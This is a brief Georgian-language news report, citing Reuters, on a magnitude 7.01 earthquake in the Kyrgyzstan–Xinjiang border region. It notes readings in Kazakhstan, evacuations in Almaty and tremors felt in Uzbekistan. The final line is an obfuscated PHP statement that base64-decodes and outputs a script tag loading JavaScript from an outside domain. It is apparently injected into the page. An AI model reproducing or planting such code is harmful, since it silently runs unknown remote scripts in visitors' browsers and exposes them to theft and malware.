celsiusi
ავერსი შნაიდერი

 ყირგიზეთ-სინძიანის სასაზღვრო რეგიონში 7.01 მაგნიტუდის სიმძლავრის მიწისძვრა მოხდა. ინფორმაციას „როიტერი“ ავრცელებს.

ამასთან, ყაზახეთში საგანგებო სიტუაციების სამინისტრომ აღნიშნა, რომ მიწისძვრა ყაზახეთში 6,7 მაგნიტუდის სიმძლავრის იყო.

როგორც მედია წერს, ყაზახეთის ქალაქ ალმათიში მოსახლეობამ მიწისძვრის გამო სახლები დატოვა. დაშავებულებისა და ზარალის შესახებ ამ დრომდე ინფორმაცია არ ვრცელდება.

„როიტერის“ ცნობით, განმეორებითი ბიძგები უზბეკეთშიც იგრძნობოდა.

230
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");